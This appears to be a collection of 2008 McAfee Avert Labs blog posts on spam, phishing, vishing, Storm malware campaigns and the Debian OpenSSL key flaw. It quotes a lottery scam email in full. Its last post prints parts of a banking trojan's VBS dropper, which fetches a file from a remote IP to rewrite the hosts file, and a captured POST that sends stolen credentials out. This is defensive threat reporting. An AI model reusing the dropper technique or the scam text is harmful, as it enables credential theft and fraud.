Having such a diverse turn-out certainly helps push the greater awareness of a multinude of cyber crime issues. It was very encouraging to see everyone are agreeing on better co-operation in shutting down rogue sites, tracking the bad guys and protecting the users. There was also the video crew from NHK, to bring the CeCOS message across to Japanese TV viewers.

Dr. Uchida-san from The Institute of Information Security and Steve Sheng from Carnegie Mellon University (CMU) also presented a different angle of the issue, from the psychological and educational aspects. Both of which compliment the policy and technology countermeasures.

Shinsuke Honjo and I gave a presentation on Monday to highlight on how malware authors are now going all out to attack on victims from all cultures. They can craft spam, phishing sites or malware to target diverse cultures and groups of Internet users in the Asia Pacific region. It was interesting for us to have our research corroborated with data from other speakers at the event. Terence Park, researcher from KrCERT/CC, in particularly demonstrated how a Korean document viewer was used as a bait, to install a password stealer. This was another classic example of how malware authors, can be using different localized techniques to get their victims.

Overall, the message that seems to be very consistent throughout are - co-operation and education. In tackling a global issue like cyber crime, these are both important factors not only in tracking and prosecuting the criminals, but also in better protecting Internet businesses and users.

It’ll come as no surprise that there are a bunch of domain registrars that are effectively supporting criminal gangs by not acting on reports of domains run for evil deeds and criminal activities. (Or as we say: They don’t wear a glowing white hat!)

I was chatting on email with Garth Bruen from KnujOn the other day and we agreed that it’s been well known for a long time in the industry that certain registrars are “black hat” and he questioned what was being done about it and pointed me at a story they had worked with the Washington Post on the subject of their top ten documented here: http://www.knujon.com/registrars/#the_list.

For a different data source (and one that looks very much like our own ) URIBL’s “hall of shame” has been on line for ages and can be viewed here: http://rss.uribl.com/nic/

I don’t take these things at face value but I’ve been aware of this issue for a couple of years and have even stood up at an APWG conference and shook my finger at registries and registrars in the room after an early presentation on double-flux and made sure they knew only they could help fight it.

Well it looks like Garths article and PR worked, the wheels of power at ICANN have turned and they have told the worst registrars to act!

So my hat tip for the month of May has to go to Garth, Cool.. Nice one… and congratulations!

ICANN state

“But if those registrars, including those publicly cited, do not investigate and correct alleged inaccuracies reported to ICANN, our escalation procedure can ultimately result in ICANN terminating their accreditation and preventing them from registering domain names,”

I suspect however that the “inaccuracies” relate to the accuracy of whois information and if that is the case I suspect that the registrars will simply start their own privacy services.

NB: Privacy and anonymity are different things if your a LEA (Law Enforcement Authority) within your jurisdiction, but to me the humble lower middle-class sysadmin (Hi @SRS) and those outside of their primary jurisdiction they are effectively the same impenetrable barrier. We repute against domains registered with privacy services because statistically speaking (in the filtering metric truck-loads of email world) they are used as anonymity services more than privacy.

Competition time: Just for fun, I’m going to open a book on the first registrar to expire date and put a black McAfee Baseball Cap up for grabs. (We engineers don’t get much SWAG, let alone give it away). Just leave a message with the registrar you think will stop trading (or be disaccredited by ICANN) first and the date you think they will be gone on.

^{Employees of McAfee, KnujOn and ICANN need not apply, I’m the judge and my decision is final!}

Final thoughts: All we need now is a few of the heavily abused cc-TLD’s to do the same and dive into the fight before we see more of these.

In the United Kingdom the term “Postcode Lottery” refers to situations where public services are available to certain postal districts where these districts are carved up by government authorities according to the first 4 characters of the post code (Our equivalent of the American Zip code*). In densely populated areas it is entirely possible for one end of a street to be lucky in a postcode lottery and the other end to be unlucky.

So, postcode Lotteries in the UK are generally bad news. They always get press attention. For instance the national health service (NHS) local trusts will provide a superior premium drug in one area but not in another creating what is known as a Postcode lottery. Prescription charges is another good example.

The remote money fraudsters are taking a very different view!
According to the bottom-feeders a Postcode Lottery is a competition you can win!

Sample below from my yahoo account. Notice the rotten spelling and the possible macro replacement issues, incidentally we call these PBCAK issues internally (Problem Between Chair And Keyboard)

Subject: National Postcode Lottery

National Postcode Lottery

Attention:-

Winner We bring to your notice the winning letter from Nationale Postcode Lottery {United Kingdom Promotion Company} held on the 8th of May, 2008 through Internet ballot System among 10,000 Microsoft users.Subsequently, your email address attached to ticket number 24.2.6.37.15.45 won contract sum of 800,000.00 Pounds ,winning number 100364,ref number XX/0999/171ESP and BATCH: 1211504/MIU.

We request you to pay serious attention to this notification by contacting the claims department with claim information and procedures of claim.

Mr.Jose Bolton
Tel: +44-871-nnn-0525
Fax: +44-700-nnn-0445
Email:divineagent@sify.com

Congratulations once again from our members of staff and thank you for being part of our promotional program.

Yours Sincerely,
Mrs. Stefian Smith
National Postcode Lottery

—————————————————————–
Find the home of your dreams with eircom net property
Sign up for email alerts now [advert removed]

Hardly a political issue, I’m sure you’ll agree. 419 plain and simple. But we’ve seen that email address a lot recently. Time for a good old fashioned LART’ing!

^{*The full 7 character UK postal code is very accurate, it refers to the handful of mail a postie can deliver, approximately 10 houses or thereabouts.}

A highly targeted spear phishing campaign is currently doing the rounds. Executives–including some of our own at McAfee–have received emails purportedly from the U.S. Tax Court. The emails are designed to look like a petition from the Tax Court and are fairly believable, with domains similar to the legitimate ustaxcourt.gov in the “from” address and links. There’s also a legitimate telephone number for the organisation. The executive’s name is listed as the respondent in a case versus the Commissioner of Internal Revenue.

The scammers do their homework when it comes to spear phishing. Instead of pumping out millions of emails to anybody and everybody, spear phishers send out their scams only to people they know will be susceptible to the scam. In this case a top executive–rather than the average employee–is much more likely to be involved in a court case of this nature.

Clicking on the link may result in malicious code such as keyloggers being installed on your system.

The U.S. Tax Court currently has the following notice on its web site:

“The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.”

This week’s news brings another report about arrests of people involved with Crimeware. This story is particularly notable due to the large number of individuals being charged, and because it’s been jointly announced by U.S. and Romanian authorities. Many people involved with gathering information on and prosecuting online criminals have complained about the lack of cooperation from certain countries, but this certainly shows that progress is being made in that arena.

One thing I thought was especially interesting in the report was the description of the process that was allegedly being used by the people involved:

According to the indictment, the Romania-based members of the enterprise obtained thousands of credit and debit card accounts and related personal information by phishing, with more than 1.3 million spam emails sent in one phishing attack. Once directed to a bogus site, victims were then prompted at those sites to enter access device and personal information. The Romanian “suppliers” collected the victims’ information and sent the data to U.S.-based “cashiers” via Internet chat messages. The domestic cashiers used hardware called encoders to record the fraudulently obtained information onto the magnetic strips on the back of credit and debit cards, and similar cards such as hotel keys. Cashiers then directed “runners” to test the fraudulent cards by checking balances or withdrawing small amounts of money at ATMs. The cards that were successfully tested, known as “cashable” cards, were used to withdraw money from ATMs or point-of-sale terminals that the cashiers had determined permitted the highest withdrawal limits. A portion of the proceeds was then wired to the supplier who had provided the access-device information.

This strikes me as a wonderful illustration of the resources that are now being put into the process by criminals. This isn’t a simple operation with some lone kid in his basement; this involves a network of people gathering information and testing, and relatively expensive card-writer hardware.

NDR Spam a.k.a. Backscatter has been around for years but has only recently hit the radar as a major spam issue mainly due to the rise of the botnet and spammers desperation to get messages through to the end user.

What is an NDR?
NDR short for Non Delivery Receipt is an automated email sent by an MTA that informs the sender there has been a problem with the delivery of the message they have sent.

NDRs are also referred to as Delivery Status Notifications (DSN) or simply bounce messages.

So what is NDR Spam?
NDR Spam occurs when spammers fake your email address in the From field when sending their spam. If the intended recipient of the spam does not exist or has no space left in their inbox etc. then you’ll receive a Non Delivery Receipt for an email you never actually sent.

Also contributing to this problem is Challenge/Response spam filtering services, Out Of Office notifications, List auto replies and any other auto-responder type email.

Why has it become a problem?
Spammers are constantly looking for ways to evade anti-spam filters. The recent sharp rise in NDR spam suggests that rather than just having some bad email addresses on their lists that bounce, they have started to target email addresses that bounce in order to get their spam content through to your inbox. They can do this by using totally random email addresses but with a legitimate domain that is destined to bounce or they can compile lists of email addresses that bounce when spammed. It’s even possible the spammers are targeting domains that they know return bounces with the full message attached. Basically the spammer wants to relay his spam via a legitimate mail server to get it in your inbox even if it doesn’t look pretty.

How big is the problem?
NDR spam is currently about 2% of all spam that’s down from over 4% a couple of weeks ago. It’s possible this method hasn’t been effective enough for the spammers. We believe that over 50% of these bounces are coming from the one botnet alone. NDR spam can be broken down into three main categories, an NDR with the full message attached, an NDR with only the spammy headers attached or an NDR with no spam content at all.

Detecting NDR Spam
There are several problems associated with detecting this particular type of spam.

The good news…

Reducing Outbound NDR Spam
Reducing the amount of NDRs sent by your server would also help this situation with the added benefit of reducing the load on your server.

There are two types of bounce synchronous and asynchronous. Synchronous bouncing occurs when the remote mail server rejects the message during the SMTP conversation. This helps reduce load on your server by preventing it having to send an NDR. Unfortunately this can open your server up to dictionary attacks but there are solutions to that issue such as tar pitting. An asynchronous bounce happens when the remote mail server accepts the message and later decides there is a problem with delivery so it returns it by sending an NDR to the return path of the message. I would recommend using synchronous bouncing if it is a feature of your mail server.

We could suggest that all responsible Administrators should leave the Original message in their NDRs making it much easier to identify and block these messages with existing anti-spam technologies but on the flip-side if no NDR messages had the spam content in them then it wouldn’t be worth the spammers while sending them. Each approach has its advantages and disadvantages.

Almost two years ago in 2006 Debian decided to clean up their OpenSSL implementation. They found a few lines of code that were causing Valgrind and Purify to complain about access to uninitialized memory. Without a major investigation into the purpose of the suspect lines of code they were simply removed. All basic tests continued to pass with the lines of code removed and Purify and Valgrind both stopped complaining about the improper memory access. The change was forgotten and everyone believed that the OpenSSL implementation was working just fine.

For the purposes of all the OpenSSL algorithms there was no deficiency. Encryption and decryption and hashes would be calculated correctly. The problem was that the PRNG used for generating keys by the OpenSSL library had been crippled when those critical lines were removed back in 2006. This was not discovered until just this week when Luciano Bello discovered that without those lines the only ‘random’ data used to seed the PRNG was the PID of the OpenSSL process. On many Linux systems the PID is limited to a positive signed 16 bit value. This means there are only 32,767 possibilities. When new keys and certificates were generated by OpenSSL they relied on this number to provide all of their entropy.

The consequence of this bug is that from September 2006 until May 2008 there were only 32,767 possible keys that could be generated by OpenSSL. Several individuals have generated “black lists” of every possible key that this OpenSSL implementation could generate. According to some reports this entire list can be generated in a couple hours. This weakness affects any key generated by OpenSSL including SSH and DNSSEC keys among others.

Many machines will fail to be updated in a quick manner after the discovery of this vulnerability. There are already many botnets which spread by simply brute forcing common username and password combinations over SSH. It will probably not be long until some of these networks are modified to start attempting RSA authentication using the faulty OpenSSL keys. These attacks will not take long to develop and have the potential to compromise large numbers of machines. It is important for administrators to note that even if they replace and upgrade the OpenSSL package they must recreate and replace any keys or certificates generated by the broken OpenSSL kit.

The moral for developers is to always be sure you understand the impact of your code changes. This goes extra for critical libraries like OpenSSL. Minor and seemingly inconsequential changes can leave major problems festering undetected for years. There may also be some changes in the way that Debian developers work with the developers of other related software packages like OpenSSL. Hopefully increased communication between the development teams in the future can prevent this kind of bug from recurring.

In my role as an anti-spam researcher I get to see a lot of spam. Most of the spam I see can be categorized into a fairly small range of spam types. Common examples include pharmacy, stock and watch spam.

Over the last few weeks I have seen a new type of spam. This is spam which is trying to sell a product to save money on gas. Below is an example of a gas spam:

Currently McAfee detect gas spam. Volume is low for this type of spam making up typically 0.2% of all spam.

Given the high price of oil it is not surprising that a spammer has started selling a product which claims to reduce gas bills.

Have you had any odd meetings in your Outlook or Google calendars lately? I’ve been monitoring an interesting spamming technique over the past few weeks where they are sending automatically accepted meeting requests (if you allow that) to your calendar.

The spam is originating from Gmail accounts but the Google and Outlook calendar functions are compatible so the meeting request goes straight into your calendar and you probably won’t notice it until you get a reminder at the spammers chosen time.

All the samples I’ve seen so far are Nigerian Scams which is interesting in itself as the Nigerian scammers have traditionally been less advanced in terms of coming up with new tricks.

This tactic adds a further nuisance factor for the recipients of this spam as it sets your time as “Busy”. Sure, you can turn off automatic acceptance of meeting requests via the Calendar options in Outlook and in Google Calendar but that feature is provided for a reason so why should the spammers stop us using it? This spam campaign has been low volume and targeted as is the nature of the Nigerian Scam email but there’s been alot of talk in the last few months about Gmails captcha being broken so it wouldn’t suprise me if the botnet spammers pick it up pretty soon!

Happy Anniversary!

May 3, 2008, marks the 30th anniversary of spam mail. Yes, it’s been three decades since Gary Thuerk, a Digital Equipment Corporation (DEC) employee at that time, broadcast the very first unsolicited advertising message announcing a new product, the DEC-20, to everyone on the Internet’s predecessor, the Advanced Research Projects Agency Network (ARPANET). Developed by the Defense Advanced Research Projects Agency (DARPA) of the United States Department of Defense, the ARPANET was the world’s first operational packet switching network and paved the way for the information superhighway we now call the world wide web. Take a look at the innocuous message and a write up of the events surrounding this unsolicited commercial email by clicking here: http://www.templetons.com/brad/spamreact.html.

The term “spam”, which refers to SPAM®, a canned meat product sold by the Hormel Foods Corporation, was coined to describe unwanted and unsolicited commercial email. A description of why this term was used is here: http://en.wikipedia.org/wiki/Spam_%28electronic%29#History. The term wasn’t used much in the early days, and it wasn’t until 1994 that spamming started in earnest. Deliberate commercial spamming as a form of advertising is believed to have been started by a law firm, Canter & Siegel. In 1994, the firm sent a message advertising their immigration services to more 6,000 Usenet newsgroups. They developed mass-mailer software to automate the distribution of the email, a practice still used by spammers today.

Over the past 30 years, the face of spam has changed dramatically—from simple text, to obfuscated text, phishing emails, and spammed malware. And it’s even gone beyond that to image spam, spear phishing, attachment spam, and recently even MP3 based spam. At first, spam was sent from single user accounts. Later, spammers pushed their messages through open mail servers. Today, these unwanted emails are typically sent via huge networks of zombie machines, which are designed by malware writers to send large volumes of spam very efficiently. Spamming has also seeped into new venues and morphed into new forms. Spam has evolved from newsgroup and email spamming to Instant Messaging, mobile phone spam, and blog and search result manipulation spam.

Despite Bill Gates’ prediction in 2004 that spam would cease to exist by 2006 (http://news.bbc.co.uk/1/hi/business/3426367.stm), there appears to be no end in sight, even in spite of recent laws, such as the Controlling the Assault of Non-Solicited Pornography And Marketing Act of 2003 (CAN-SPAM) introduced to help curb spam. Why does the law lack legs? It’s mainly because today’s spammers, who are motivated by the prospect of financial gains, largely operate outside of countries with strict anti-spam laws.

In some ways, Bill Gates’ prediction was correct in that spam filtering solutions have been developed over this period of time to detect and filter almost all the spam that is sent, but this is cleaning up the problem, rather than eliminating it entirely. I don’t think anyone would favour an “email tax” to reduce spam, and Challenge/Response systems only contribute to more unwanted mail and slower communications. I personally believe it would take a concerted effort on the part of Internet Service Providers (ISPs) and Internet backbone providers to filter spam at its sources and block rogue “bullet proof” ISPs. Technology currently exists to identify and isolate hijacked spam sending zombie PCs, but ISPs appear reluctant to commit to the infrastructure and customer support needed to implement these systems in a highly competitive and price-sensitive market. A better alternative may be a transition to a newer, more secure, mail protocol that would make it easier to eliminate spam email at the source.

In addition to ever more creative ways to block received spam, is an upgrade to the SMTP protocol answer? Or do we need more government legislation? Or is it something else altogether? Will it take another 30 years to put spammers out of business? I sure hope not!

A recent report by the OECD (Organisation for Economic Co-operation and Development) indicated that counterfeit and pirated goods in 2005 could have had a value of up to 200 billion U.S. dollars.

One path to fake goods is via spam, which frequently offers counterfeit medicines and replica watches. A recent post from the French CERT-LEXSI blog caught my attention regarding fake luxury mobile phones selling for absolutely unbeatable prices.

These phones are normally manufactured by Vertu, a British subsidiary of Nokia, and are sold in luxury shops in Monte Carlo, Cannes, or Beverly Hills. On their official top-quality site (www.vertu.com), prices are not mentioned, but by visiting some authorised retailer Web sites I found exorbitant figures. Some mobiles, bedecked in gold and diamonds, exceed $90,000. Really too expensive for me!

Using Google, it’s really easy to find fake sites offering these counterfeit marvels. In fact it is easier to find the fake sites than the authorized ones!

And the prices–assuming you need one of these–are attractive: less than $1,000 for a copy of an original that sells for $97,300.

Regular spam campaigns promote such Vertu “replica” sites. Be vigilant, however, because appearances can be deceiving. Sites are numerous and their common feature is their high-quality, professional look–with black backgrounds that imitate the official site.

These sites are hosted at various providers in various countries (USA, Germany, and Hong Kong). Some of them seem clean; others are known for bulletproof hosting services and their relationship with the Russian Business Network, an alleged cybercrime organization. The registrars are also diverse (Estonia, Russia, and Korea) but more questionable. It is surprising that these do not require any name verification before accepting registrations. But once you know that a lot of spam and malware-related Web sites come from them, their permissiveness is easier to understand. Registrant addresses and e-mails give us an inkling regarding the nationality of their owners: China and Russia.

For the potential buyer, the key issue concerns the risk. The Swiss Watch Industry clearly points out that the buyer is the first victim, because purchasing counterfeits is:

• Agreeing that piracy is OK; the counterfeiter seeks to appropriate somebody else’s hard work and investment.
• Supporting and financing organized crime; links between counterfeiting activities and criminal networks have been established in many cases.
• Accepting underground and child labor.
• Endangering your own health and safety; the risk is real with medicines, aircraft and auto spare parts, medical supplies, and cosmetics.
• Reducing employment and stifling growth; this form of criminality contributes to the reduction of employment, which is estimated to cost more than 200,000 jobs worldwide per year.
• Being liable to criminal sanctions; the buyer may face criminal and financial sanctions. The mere possession of counterfeits is illegal in many countries. Furthermore, penalties could be claimed by legitimate intellectual property rights’ owners. Customs also can seize and destroy illegal items and assess fines.

And if these considerations don’t stop you, remember you run the risk of not receiving the goods you pay for; instead you might have your banking details stolen and reused in future malevolent activities. None of the sites I visited yesterday offered a secure Internet payment system; one of them housed a hidden Iframe linked to a known password-stealing Trojan.

The Internal Revenue Service (IRS) is some phishers favourite target, especially during the tax season each year. We first saw IRS phishing emails in our spam traps in 2005 and have seen them every year since, particularly when the U.S. tax year comes to a close.

Does the early bird catch the worms?

Who would consider a tax issue as early as in September? The phishers must think someone would. We started to see IRS phishing e-mails as early as September last year. The volume has increased in the following months, with a sharp increase in January 2008, and is showing no signs of abating today.

Targeting both individuals and businesses

Most IRS phishing e-mails target individuals, but there were several campaigns which targeted business/corporate accountants and treasury managers this year. The phishing e-mails claimed that there were some recent changes to business and corporate tax laws and asked the recipient to download the relevant files by clicking the embedded links.

Using an IP address instead of a normal domain name is commonly seen in phishing e-mails, because the phishers want to hide the phish domain name from the recipients eyes. In the sample below the phisher also claims that the encoded IP is a document reference and the phishing uri is a personalized link.

Common characteristics of an IRS phishing e-mail

The IRS phishing e-mails normally have a faked “From:” header to try to let the recipients think it is from the IRS. The message body part usually begins with different variations of the IRS logo. They usually follow this with how much money you are supposedly to be refunded for the year. Then the recipients are asked to fill a tax refund form by clicking a link which is normally hidden behind text, such as “Please click here”. The link will lead the recipients to an online form which requests personal information such as Social Security Number, Name, Address, Date of Birth, mother’s maiden name, Bank account number, Credit card number, Expiration date, Card verification number, ATM PIN number and name of the issuing bank.

Recently some phishers have enclosed a html attachment to the e-mail rather than including a link to a phishing web site, and have asked the recipient to open the attachment and submit the details via the attached form.

We also spotted an IRS Vishing (short for “voice phishing”) campaign this year.

All in all it has been a busy tax season for the IRS phishers. The IRS give some helpful tips on how to avoid being caught out by these types of phishing emails on their web site.

Meeting the German participants of the McAfee SPAM Experiment for dinner yesterday turned out to be very interesting and provided some unexpected results. After 14 days living on a Spam-mail diet they are still in good shape. Some are so into it that they even installed SiteAdvisor to find out, in advance, if a site is likely to send you spam when you leave your email address there…

Getting in trouble with the girl-friend for browsing dating web sites while leaving his mail-address for possible use by spammers was one of the less expected (and desired) results.

And then this: Collecting spam through surfing porn sites really does not work! All who tried told me they didn’t receive much spam when leaving their email on such sites. That really was a surprise for me. I would have expected a lot of spam, as there seems to be a fairly obvious link between porn and certain drugs and enhancement pills…

Constantly living in a world full of (empty) promises seems to have some effect as well: “It’s nice sitting here with you, but soon I’ll be hanging out with Tom Cruise and Jessica Alba and I will even get money for it” - it’s amazing what some shady people promise you, just to get your email address and other personal data.

There was some amazement when two participants figured out they had received nearly identical advance-fee scams: One in English, the other one in the Polish language.

Well, I’m sure all participants will have a lot of interesting experiences and stories to share at the end of the experiment and I sincerely hope they manage to stop clicking on all those ‘you are the 100,000,000,000 visitor of this webpage’-banners

Oh, and a last note: If there is one movie you should watch this year, make sure it’s the Futurama: Bender’s Big Score where Spam and Phishing play key elements in the story!!

A recent article in The Register seems to imply that if you’ve got out-of-date security software, any fraudulent charges to your accounts could suddenly be your liability. The advice given by the British Bankers’ Association includes much more than just the state of one’s security software; this could just as easily include misaddressing a check or falling victim to a phishing attack, among other things. On the other hand, it’s highly unlikely it would ever be worth the bank’s effort to invoke this clause.

From the Banking Code of the British Bankers’ Association

12.11 If you act fraudulently, you will be responsible for all losses on your account. If you act without reasonable care, and this causes losses, you may be responsible for them. (This may apply, for example, if you do not follow Section 12.5 or 12.9 or you do not keep to your account’s terms and conditions.)

These two sections offer quite a few bullet points about how not to be a victim of identity theft or financial fraud.

12.5
• Do not keep your checkbook and cards together.
• Do not let anyone else use your card, and do not tell anyone else your PIN, password, or other security information.
• Your bank or building society will never ask you for your PIN. If you are in any doubt about whether a caller is genuine or if you are suspicious, take the caller’s details and call us.
• If you change your PIN, you should choose your new PIN carefully.
• Try to remember your PIN, password, and other security information, and securely destroy the notice as soon as you receive it.
• Never write down or record your PIN, password, or other security information.
• Always take reasonable steps to keep your card safe and your PIN, password, and other security information secret at all times.
• If your card issuer takes part in a secure online payment system (such as Verified by Visa or MasterCard SecureCode), consider signing up either at their Web site or whenever you are given the option while shopping online. This involves your registering a password with your card company; you will be asked for the password whenever you shop at an online retailer taking part in the scheme. You should keep this password secret.
• Never give your account details or other security information to anyone unless you know who they are and why they need them.
• Keep your card receipts and other information about your account containing personal details (for example, statements) safe and get rid of them carefully.
• Take care when storing or getting rid of information about your accounts. People who commit fraud use many methods, such as “bin raiding” (a.k.a., dumpster diving) to get this type of information. You should take simple steps such as shredding printed material.
• Be aware that your mail is valuable information in the wrong hands. If you don’t receive a bank statement, card statement, or any other expected financial information, contact us.
• You will find the APACS Web site a helpful guide on what to do if you suspect card fraud.

12.9
• Keep your PC secure. Use up-to-date anti-virus and spyware software and a personal firewall.
• Keep your passwords and PINs secret.
• We (or the police) will never contact you to ask you for your online banking or payment card PINs, or your password information.
• Treat e-mails you receive from senders claiming to be from your bank or building society with caution and be wary of e-mails or calls asking you for any personal security details.
• Always access Internet banking sites by typing the bank or building society’s address into your Web browser. Never go to an Internet banking site from a link in an e-mail and then enter personal details.
• Follow our advice: Our Web sites are usually a good place to get help and guidance on how to stay safe online.
• Visit www.banksafeonline.org.uk for useful information.

But wait, there’s a caveat: They won’t invoke this willy-nilly:

12.12 Unless we can show that you have acted fraudulently or without reasonable care, your liability for your card being misused will be limited as follows.

This code would be far too difficult and costly to implement in most cases. It would have to be a particularly large sum of money involved in the fraud, enough that it might be deemed worth the cost of an investigation, alienating a customer, and courting a heap of bad PR.

Although this is all good advice from the BBA, it looks like the assertion that people will suddenly be financially liable for having out-of-date security software is just a case of spreading FUD.

It’s déjà vu all over again with the latest Nuwar campaign over the weekend offering belated Valentine e-cards. The malicious e-cards contain a URL to random blogspot.com pages sporting a love theme linking to the Storm executable. The bait pages by themselves do not contain any exploits and rely solely on end-user interaction to click and install the malware. The executables being offered are “love.exe” and “withlove.exe” - both being hosted on a fast-flux domain. A copy of the BlogSpot pages hosting storm is shown below.

This is not the first time BlogSpot.com has been abused to host malware laced pages. Zlob a.k.a Puper Trojan did that last year and also spam messages these days contain Google’s Blogger links to blogspot.com that do simple forwards to the spammer’s domain.

But why would the Nuwar gang launch a Valentine-themed campaign in April? Either the Storm authors are suffering from acute Valentine hangover or have their holiday calendar messed up! Especially since Easter passed off surprisingly quietly without a Storm

Within the first 24 hours, participants in McAfee’s SPAM Experiment have already started to receive a wide range of spam. The U.S. economic crunch (bearing in mind I am NO economist ) may be having an effect on spam campaigns, as several of the recipients, browsing the Web and working independently of each other, have started to receive offers that center around guaranteed loans, credit cards, and debt relief.

The spam that isn’t offering money is trying to take it away from the participants. Three of our “victims” have already been targeted by phishers! It didn’t take long at all for some of their e-mail address to be picked up and exploited by fraudsters.

According to their blogs, some of the participants started to receive spam almost immediately after they clicked on pop-ups on the first day and provided their e-mail addresses for free offers! As usual with the free offers it turns out that it’s almost impossible to meet the conditions to get the free Xboxes, Wiis, iPods, iPhones, etc.

At the time of this writing, the overall spam submission counts have exceeded 550 from 17 of the participants. One participant alone has received more than 130 pieces of spam!

More to come during the next 29 days. Make sure you follow the participants blogs and stay tuned.

Take equal parts e-mail, willing and daring participants, some shady ePharmacies (OK, OK–it’s Viagra), a few eCards, and a heavy dose of dubious business activities. Mix them together with just a sprinkle of reality TV (or blogging in this case) and you have The S.P.A.M Experiment, which launched this week.

Avert Labs invests quite a bit of resources in fighting spam and educating users about fighting spam. Anyone who follows this blog certainly knows that. The purpose of this experiment, however, is quite different. It is to show spam for what it really is: dangerous. Spam is not just a nuisance. It’s a constantly evolving threat to our identities and our wallets. Spam can put users at risk of far more than just lost inbox space. And to show spam for the threat it really is, we are actually having users do what we always tell them not to do!

Come on. You gotta admit it. It is very cool.

The S.P.A.M. Experiment is designed to show the scale of the problem of spam and the risks associated in opening or responding to unsolicited e-mail. It will demonstrate just how resourceful and quick cybercriminals (and make no mistake here–spammers are criminals) are to create new ways of evading anti-spam filters and relieving people of their money. The worldwide participants will be sharing their experiences through blogging so you will be able to follow the action as it develops. I recommend you subscribe to the many global feeds that are here. We started only earlier this week and the participants are already getting results!

Want to know why spam is dangerous? Want to see how spam links to cybercrime? We are gonna show you over the next 30 days.

Yes, today is April Fool’s Day and the usual pranks are circulated through the net. Some funny. Some not so funny. And some very intriguing ideas.

Offensivecomputing.net, a site dedicated to malware analysis, suddenly looking like one of the current Nuwar Campaigns, was complete with file downloads (though benign ones) that may have left many users staring at their screens. I did not link directly to them, because including links here that result in executables being automatically downloaded is not a good idea (plus it’s their main page, likely to be changed back in some hours).

But the really interesting idea came from Google: An engine to search tomorrows web, today! Finding out what website will sport malicious downloads the next day, knowing what websites will fall victim to the ongoing Mass Hacks (reported on here and most recently by Dancho Danchev) within the next 24 hours……. That would be so priceless!

But then Google took Security Nightmares to a next level with another idea: Sending Email back in time. While that feature would be a Spear Phisher’s dream come true, I am rather happy it’s not real.

In a natural evolution of phishing, Internet scamsters are switching to “Vishing” — short for “voice phishing” in order to steal user information. Vishing combines the use of Voice over IP (VoIP) phones along with clever social engineering to gain access to personal and financial details of the victim by exploiting the perceived trust in traditional telephone services.

With increased user education about Internet scams, people are more aware of the fact that an e-mail containing a URL could be malicious in nature. Instead of using a misdirected Web link to some phony banking sites to steal user information, fraudsters are luring victims to something more credible like calling a toll free number and having an automated recording asking for account information.

Potential victims would get the usual convincing e-mail phish conjured to look like a genuine complaint. But instead of being directed to a website to resolve the pending issue, they are given a phone number to call. Those who call the “customer service” number are greeted with a pirated recording of an automated voice system for the targeted financial institution and are requested to enter their card number in order to authenticate. They are then led through a series of voice-prompted menus that ask for PIN codes, card expiration date, date of birth and other critical information. Once the victim enters these details, the visher has enough information to use it for identity theft and make fraudulent use of the information.

With the US tax deadline nearing, McAfee Avert Labs has observed a surge in IRS refund phishing attempts. In addition to the usual e-mail phish we also observed IRS vishing campaigns targeting VISA or MasterCard debit cards.

Here’s another example of a vish campaign targeting a well known bank.

Other variants of vishing use CallerID to spoof an incoming call to appear as an 1-800 number or SMS messages purporting to be from a bank. A text or pre-recorded voice message is then played out, persuading the victim into believing that their account has been frozen due to suspicious activity. As the incoming call would display a 1-800 number from a recognized institution, it creates a false sense of security about the authenticity of the message.

Vishing is all set to flourish with advancements in Voice over Internet Protocol (VoIP) technology that enables cheap and anonymous Internet calling. Given the ease with which CallerID boxes can be tricked into displaying erroneous information, it is becoming increasingly difficult to distinguish phishing attempts from genuine attempts to contact customers.

If you encounter a vishing attempt and have a question concerning your account or card, please contact the financial institution only using a telephone number obtained from your account statement, a telephone book or other verifiable, genuine correspondence.

In “celebration” of tomorrow being April Fool’s Day, the people behind Nuwar a.k.a. Storm have launched a new E-mail spam campaign. An E-mail with a subject and a short body text like “Happy April Fool’s Day!” or similar would have a usual, for Nuwar anyway, all-numeric-IP http link. Following that link brings up a page like this:

If you wait those 5 seconds, it’ll try to download file funny.exe to your computer. If you click on the image, it’s kickme.exe. And if you click on “click here” it’s foolsday.exe. All of them are nothing but a new Nuwar variant.

A few days ago McAfee Avert Labs came across yet another example of how effective and especially dangerous phishing can be. We received a sample in the form of an .exe file that when executed would start Internet Explorer and present the login page of a well-known Italian bank.

At first sight, for the inexperienced and security-unaware user, the Web site looked exactly like the real thing. There were no obvious signs of fraud as “only” the user name and password to get into the banking page were requested. Once these initial credentials were inserted, a second page requested a card number, the expiration date, and the CVV2/CVC2 number. After this, you guessed it, a simple message–”Wrong details, try again!”

What actually happened is that the sample creates the file finaltemp.vbs and runs it immediately via the Windows Script Interpreter, wscript.exe. The VBS script is immediately removed from the system. Here are some interesting snippets of the code embedded into the executable:

Set WshShell = WScript.CreateObject("WScript.Shell")
strURL = http://x.x.x.x/twiki/b.txt
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")

More code creates some objects used to write the contents of the file through HTTP requests using Microsoft.XmlHttp.

fileToCopy = fso.GetSpecialFolder(WindowsFolder).Path & "\system32\drivers\etc\hosts"

This will copy the content of the b.txt, seen above, to the host file–leading to compromised name resolution!

WshShell.Run "iexplore.exe"
Set aFile = fso.GetFile(strOutFile)
aFile.Delete

This will run Internet Explorer, opening the main page of the bank with what looks like the correct address for the bank in the browser’s address bar; however, this ultimately points to the bad IP set in the modified host file. At this stage the unaware user enters his or her information on the page, which gets sent to a remote location that is certainly not the secure bank environment. All of this happens silently–without any popping cmd shells, active objects complaints from IE, or any other suspicious activity.

If we look at a packet-sniffer trace, we can see the POST request made to the URL mentioned in the snippet above. It was registered through (no kidding!) Godaddy.com. Also we will see all the requests made to the IP written to the host file that was modified by the VBS script–including a POST containing the username, password, card number with the security code, and expiry date. (In this case you can see that the Avert Labls account with password “testing” is now officially owned.)

POST /index.php?MfcISAPICommand=ProcessCC&UsingSSL=1&login=AVERTLABS&
pass=TESTING HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://X.X.X.X/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: poste.it
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache

